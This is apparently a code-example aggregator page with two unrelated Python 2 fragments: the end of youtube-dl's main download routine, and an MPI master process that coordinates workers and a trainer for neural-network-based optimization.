        'max_sleep_interval': opts.max_sleep_interval,
        'external_downloader': opts.external_downloader,
        'list_thumbnails': opts.list_thumbnails,
        'playlist_items': opts.playlist_items,
        'xattr_set_filesize': opts.xattr_set_filesize,
        'match_filter': match_filter,
        'no_color': opts.no_color,
        'ffmpeg_location': opts.ffmpeg_location,
        'hls_prefer_native': opts.hls_prefer_native,
        'hls_use_mpegts': opts.hls_use_mpegts,
        'external_downloader_args': external_downloader_args,
        'postprocessor_args': postprocessor_args,
        'cn_verification_proxy': opts.cn_verification_proxy,
        'geo_verification_proxy': opts.geo_verification_proxy,

    }

    with YoutubeDL(ydl_opts) as ydl:
        # Update version
        if opts.update_self:
            update_self(ydl.to_screen, opts.verbose, ydl._opener)

        # Remove cache dir
        if opts.rm_cachedir:
            ydl.cache.remove()

        # Maybe do nothing
        if (len(all_urls) < 1) and (opts.load_info_filename is None):
            if opts.update_self or opts.rm_cachedir:
                sys.exit()

            ydl.warn_if_short_id(sys.argv[1:] if argv is None else argv)
            parser.error(
                'You must provide at least one URL.\n'
                'Type youtube-dl --help to see a list of all options.')

        try:
            if opts.load_info_filename is not None:
                retcode = ydl.download_with_info_file(compat_expanduser(opts.load_info_filename))
            else:
                retcode = ydl.download(all_urls)
        except MaxDownloadsReached:
            ydl.to_screen('--max-download limit reached, aborting.')
            retcode = 101

    sys.exit(retcode)

Example 50

View license
def master_process(print_statements):
    file_record = open("data/mpi_time_data.csv", "a") # record times for experiment
    from learning_objective.hidden_function import evaluate, true_evaluate, get_settings
    import random
    import utilities.optimizer as op

    print "MASTER: starting with %d workers" % (size - 1)

    # Setup
    t1 = time.time()            # Get amount of time taken
    num_workers = size - 1      # Get number of workers
    closed_workers = 0          # Get number of workers EXIT'ed

    # Get settings relevant to the hidden function being used
    lim_domain, init_size, additional_query_size, init_query, domain, selection_size = get_settings()
    
    # Acquire an initial data set
    dataset = None
    init_assigned = 0           # init query counters
    init_done = 0

    print "Randomly query a set of initial points... ",

    while init_done < init_size:
        # Get a worker (trainer does not initiate conversation with master)
        data = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
        source = status.Get_source()
        tag = status.Get_tag()

        if tag == WORKER_READY:
            if init_assigned < init_size:
                # Send a (m,) array query to worker
                comm.send(init_query[init_assigned, :], dest=source, tag=SEND_WORKER)
                init_assigned += 1

            else:
                # No more intial work available. Give random work
                comm.send(domain[random.choice(range(domain.shape[0])), :], 
                          dest=source, tag=SEND_WORKER)

        if tag == WORKER_DONE:
            # data is a (1, m) array
            if dataset == None: 
                dataset = data

            else:
                dataset = np.concatenate((dataset, data), axis=0)

            if contains_row(data[0, :-1], init_query):
                init_done += 1

            if print_statements:
                string1 = "MASTER: Init queries done: %3d. " % init_done
                string2 = "Submission from WORKER %2d is: " % source
                print string1 + string2 + str(data)

    print "Complete initial dataset acquired"

    # NN-LR based query system
    optimizer = op.Optimizer(dataset, domain)
    optimizer.train()

    # Select a series of points to query
    selected_points = optimizer.select_multiple(selection_size) # (#points, m) array

    # Set counters
    listen_to_trainer = True
    trainer_is_ready = True     # Determines if trainer will be used
    trainer_index = 0   # Keeps track of data that trainer doesn't have
    selection_index = 0         # Keeps track of unqueried selected_points 
    queries_done = 0            # Keeps track of total queries done
    queries_total = additional_query_size

    t0 = time.time()

    print "Performing optimization..."

    while closed_workers < num_workers:
        if selection_index == selection_size:
            # Update optimizer's dataset and retrain LR
            optimizer.retrain_LR()                            
            selected_points = optimizer.select_multiple(selection_size) # Select new points
            selection_size = selected_points.shape[0]     # Get number of selected points
            selection_index = 0                           # Restart index
            
        if queries_done < queries_total and trainer_is_ready and (dataset.shape[0] - trainer_index - 1) >= 100:
            # Trainer ready and enough new data for trainer to train a new NN.
            if print_statements:
                print "MASTER: Trainer has been summoned"

            comm.send(dataset[trainer_index: -1, :], dest=TRAINER, tag=SEND_TRAINER)
            trainer_index = dataset.shape[0] - 1
            trainer_is_ready = not trainer_is_ready # Trainer is not longer available.

        if queries_done >= queries_total and trainer_is_ready:
            comm.send("MASTER has fired Trainer", dest=TRAINER, tag=EXIT_TRAINER)

        # Check for data from either worker or trainer
        data = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
        source = status.Get_source() 
        tag = status.Get_tag()         

        if tag == WORKER_READY:
            if queries_done < queries_total:
                comm.send(selected_points[selection_index, :], 
                          dest=source, tag=SEND_WORKER) 
                selection_index += 1

            else:
                comm.send(None, dest=source, tag=EXIT_WORKER)

        elif tag == WORKER_DONE:
            dataset = np.concatenate((dataset, data), axis=0) # data is (m, 1) array
            optimizer.update_data(data)                       # add data to optimizer
            queries_done += 1                                 
            
            if print_statements:
                string1 = "MASTER: Queries done: %3d. " % queries_done
                string2 = "Submission from Worker %2d: " % source
                print string1 + string2 + str(data)
            else:
                # Print some sort of progress:
                if queries_done % (queries_total/10) == 0:
                    print "%.3f completion..." % ((1.*queries_done)/queries_total)

            if queries_done <= queries_total:
                info = "%.3f," % (time.time()-t0)
                file_record.write(info)

        elif tag == TRAINER_DONE:
            if listen_to_trainer:
                if print_statements:
                    print "MASTER: Updating neural network"

                W, B, architecture = data
                optimizer.update_params(W, B, architecture)

            trainer_is_ready = not trainer_is_ready 

        elif tag == EXIT_WORKER or tag == EXIT_TRAINER:
            closed_workers += 1 

    file_record.write("NA\n")
    file_record.close()
    t2 = time.time()
    print "MASTER: Total update time is: %3.3f" % (t2-t1)
    print "Best evaluated point is:"
    print dataset[np.argmax(dataset[:, -1]), :]
    print "MASTER: Predicted best point is:"
    optimizer.retrain_LR()
    domain, pred, hi_ci, lo_ci, nn_pred, ei, gamma = optimizer.get_prediction()
    index = np.argmax(pred[:, 0])
    print np.concatenate((np.atleast_2d(domain[index, :]), np.atleast_2d(pred[index, 0])), axis=1)[0, :]